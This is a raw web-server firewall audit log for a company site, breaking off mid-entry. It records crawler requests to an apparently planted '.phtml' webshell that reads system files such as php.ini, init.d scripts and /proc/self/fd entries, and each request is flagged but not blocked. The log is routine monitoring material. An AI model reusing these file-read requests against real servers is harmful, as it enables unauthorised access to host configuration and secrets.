/admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fopt%2Fplesk%2Fphp%2F8.2%2Fetc&viewfile=%2F%2Fopt%2Fplesk%2Fphp%2F8.2%2Fetc%2Fphp.ini HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --c6b0f029-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 27151 Connection: close Content-Type: text/html; charset=UTF-8 --c6b0f029-H-- Message: Warning. Matched phrase "etc/php.ini" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/php.ini found within ARGS:viewfile: /opt/plesk/php/8.2/etc/php.ini"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/php.ini" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/php.ini found within ARGS:viewfile: /opt/plesk/php/8.2/etc/php.ini"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCGF4oVQnPDyHnl9oO60wAAAAY"] Apache-Handler: application/x-httpd-php Stopwatch: 1750107671598222 10760 (- - -) Stopwatch2: 1750107671598222 10760; combined=3067, p1=508, p2=2379, p3=52, p4=47, p5=81, sr=149, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --c6b0f029-Z-- --4d65fa6d-A-- [17/Jun/2025:02:34:50.299467 +0530] aFCG8ooVQnPDyHnl9oO7eAAAAAY 216.73.216.71 44670 127.0.0.1 7081 --4d65fa6d-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fsnap%2Fcore20%2Fcurrent%2Fetc%2Finit.d&viewfile=%2F%2Fsnap%2Fcore20%2Fcurrent%2Fetc%2Finit.d%2Fssh HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --4d65fa6d-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 4126 Connection: close Content-Type: text/html; charset=UTF-8 --4d65fa6d-H-- Message: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /snap/core20/current/etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Message: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /snap/core20/current/etc/init.d/ssh"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /snap/core20/current/etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCG8ooVQnPDyHnl9oO7eAAAAAY"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /snap/core20/current/etc/init.d/ssh"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCG8ooVQnPDyHnl9oO7eAAAAAY"] Apache-Handler: application/x-httpd-php Stopwatch: 1750107890295297 4256 (- - -) Stopwatch2: 1750107890295297 4256; combined=2194, p1=357, p2=1669, p3=38, p4=30, p5=100, sr=95, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --4d65fa6d-Z-- --fc008022-A-- [17/Jun/2025:02:35:04.530160 +0530] aFCHAIoVQnPDyHnl9oO7iAAAAAY 34.225.24.180 53536 127.0.0.1 7081 --fc008022-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//proc/self/fd&viewfile=//proc/self/fd/128 HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 34.225.24.180 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --fc008022-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2955 Connection: close Content-Type: text/html; charset=UTF-8 --fc008022-H-- Message: Warning. Matched phrase "proc/self/fd/1" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/1 found within ARGS:viewfile: /proc/self/fd/128"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "proc/self/fd/1" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/1 found within ARGS:viewfile: /proc/self/fd/128"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCHAIoVQnPDyHnl9oO7iAAAAAY"] Apache-Handler: application/x-httpd-php Stopwatch: 1750107904525375 4848 (- - -) Stopwatch2: 1750107904525375 4848; combined=2434, p1=345, p2=1966, p3=42, p4=29, p5=52, sr=99, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --fc008022-Z-- --7e28df41-A-- [17/Jun/2025:02:35:41.439135 +0530] aFCHJZVkCcfT-Z8NQYys4wAAAAc 216.73.216.71 41094 127.0.0.1 7081 --7e28df41-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fsnap%2Fcore20%2Fcurrent%2Fetc%2Finit.d&viewfile=%2F%2Fsnap%2Fcore20%2Fcurrent%2Fetc%2Finit.d%2Fhwclock.sh HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --7e28df41-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 4581 Connection: close Content-Type: text/html; charset=UTF-8 --7e28df41-E-- --7e28df41-H-- Message: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /snap/core20/current/etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Message: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /snap/core20/current/etc/init.d/hwclock.sh"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /snap/core20/current/etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCHJZVkCcfT-Z8NQYys4wAAAAc"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /snap/core20/current/etc/init.d/hwclock.sh"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCHJZVkCcfT-Z8NQYys4wAAAAc"] Apache-Handler: application/x-httpd-php Stopwatch: 1750107941434049 5161 (- - -) Stopwatch2: 1750107941434049 5161; combined=2542, p1=349, p2=2036, p3=41, p4=33, p5=83, sr=96, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --7e28df41-Z-- --ffe70c06-A-- [17/Jun/2025:02:37:17.387521 +0530] aFCHhaEB9lmWsOo-rPOMtAAAAAU 216.73.216.71 40900 127.0.0.1 7081 --ffe70c06-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fsnap%2Fcore20%2F2582%2Fetc%2Finit.d&viewfile=%2F%2Fsnap%2Fcore20%2F2582%2Fetc%2Finit.d%2Fcryptdisks HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --ffe70c06-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3439 Connection: close Content-Type: text/html; charset=UTF-8 --ffe70c06-H-- Message: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /snap/core20/2582/etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Message: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /snap/core20/2582/etc/init.d/cryptdisks"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /snap/core20/2582/etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCHhaEB9lmWsOo-rPOMtAAAAAU"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /snap/core20/2582/etc/init.d/cryptdisks"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCHhaEB9lmWsOo-rPOMtAAAAAU"] Apache-Handler: application/x-httpd-php Stopwatch: 1750108037382860 4716 (- - -) Stopwatch2: 1750108037382860 4716; combined=2066, p1=336, p2=1577, p3=38, p4=31, p5=84, sr=91, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --ffe70c06-Z-- --1b12731a-A-- [17/Jun/2025:02:37:19.485316 +0530] aFCHh6EB9lmWsOo-rPOMtwAAAAU 216.73.216.71 33482 127.0.0.1 7081 --1b12731a-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fsnap%2Fcore20%2Fcurrent%2Fetc%2Finit.d&viewfile=%2F%2Fsnap%2Fcore20%2Fcurrent%2Fetc%2Finit.d%2Fprocps HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --1b12731a-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3546 Connection: close Content-Type: text/html; charset=UTF-8 --1b12731a-H-- Message: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /snap/core20/current/etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Message: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /snap/core20/current/etc/init.d/procps"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /snap/core20/current/etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCHh6EB9lmWsOo-rPOMtwAAAAU"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /snap/core20/current/etc/init.d/procps"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCHh6EB9lmWsOo-rPOMtwAAAAU"] Apache-Handler: application/x-httpd-php Stopwatch: 1750108039480154 5243 (- - -) Stopwatch2: 1750108039480154 5243; combined=3012, p1=453, p2=2352, p3=52, p4=38, p5=117, sr=108, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --1b12731a-Z-- --cc65c833-A-- [17/Jun/2025:02:37:22.213382 +0530] aFCHipVkCcfT-Z8NQYytLgAAAAc 216.73.216.71 33796 127.0.0.1 7081 --cc65c833-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fsnap%2Fcore20%2Fcurrent%2Fetc%2Finit.d&viewfile=%2F%2Fsnap%2Fcore20%2Fcurrent%2Fetc%2Finit.d%2Fapparmor HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --cc65c833-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 4617 Connection: close Content-Type: text/html; charset=UTF-8 --cc65c833-H-- Message: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /snap/core20/current/etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Message: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /snap/core20/current/etc/init.d/apparmor"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /snap/core20/current/etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCHipVkCcfT-Z8NQYytLgAAAAc"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /snap/core20/current/etc/init.d/apparmor"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCHipVkCcfT-Z8NQYytLgAAAAc"] Apache-Handler: application/x-httpd-php Stopwatch: 1750108042209031 4423 (- - -) Stopwatch2: 1750108042209031 4423; combined=2427, p1=388, p2=1875, p3=43, p4=32, p5=89, sr=89, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --cc65c833-Z-- --5c28b07e-A-- [17/Jun/2025:02:38:03.433871 +0530] aFCHs0cTB7P_sALtclAB4QAAAAI 216.73.216.71 60884 127.0.0.1 7081 --5c28b07e-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fself%2Froot%2Fetc%2Finit.d&viewfile=%2F%2Fproc%2Fself%2Froot%2Fetc%2Finit.d%2Fcryptdisks HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --5c28b07e-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3433 Connection: close Content-Type: text/html; charset=UTF-8 --5c28b07e-H-- Message: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /proc/self/root/etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Message: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /proc/self/root/etc/init.d/cryptdisks"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /proc/self/root/etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCHs0cTB7P_sALtclAB4QAAAAI"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /proc/self/root/etc/init.d/cryptdisks"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCHs0cTB7P_sALtclAB4QAAAAI"] Apache-Handler: application/x-httpd-php Stopwatch: 1750108083429948 3977 (- - -) Stopwatch2: 1750108083429948 3977; combined=2135, p1=345, p2=1642, p3=37, p4=28, p5=83, sr=89, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --5c28b07e-Z-- --80dc585d-A-- [17/Jun/2025:02:38:05.983126 +0530] aFCHtZVkCcfT-Z8NQYytRwAAAAc 216.73.216.71 32968 127.0.0.1 7081 --80dc585d-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fsnap%2Fcore20%2Fcurrent%2Fetc%2Finit.d&viewfile=%2F%2Fsnap%2Fcore20%2Fcurrent%2Fetc%2Finit.d%2Fudev HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --80dc585d-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 5339 Connection: close Content-Type: text/html; charset=UTF-8 --80dc585d-H-- Message: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /snap/core20/current/etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Message: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /snap/core20/current/etc/init.d/udev"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /snap/core20/current/etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCHtZVkCcfT-Z8NQYytRwAAAAc"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /snap/core20/current/etc/init.d/udev"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCHtZVkCcfT-Z8NQYytRwAAAAc"] Apache-Handler: application/x-httpd-php Stopwatch: 1750108085978451 4735 (- - -) Stopwatch2: 1750108085978451 4735; combined=2471, p1=368, p2=1923, p3=39, p4=31, p5=110, sr=99, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --80dc585d-Z-- --2d205e29-A-- [17/Jun/2025:02:38:16.579619 +0530] aFCHwIoVQnPDyHnl9oO8DgAAAAY 54.235.125.129 40060 127.0.0.1 7081 --2d205e29-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//proc/self/fd&viewfile=//proc/self/fd/133 HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 54.235.125.129 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --2d205e29-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2953 Connection: close Content-Type: text/html; charset=UTF-8 --2d205e29-H-- Message: Warning. Matched phrase "proc/self/fd/1" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/1 found within ARGS:viewfile: /proc/self/fd/133"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "proc/self/fd/1" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/1 found within ARGS:viewfile: /proc/self/fd/133"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname 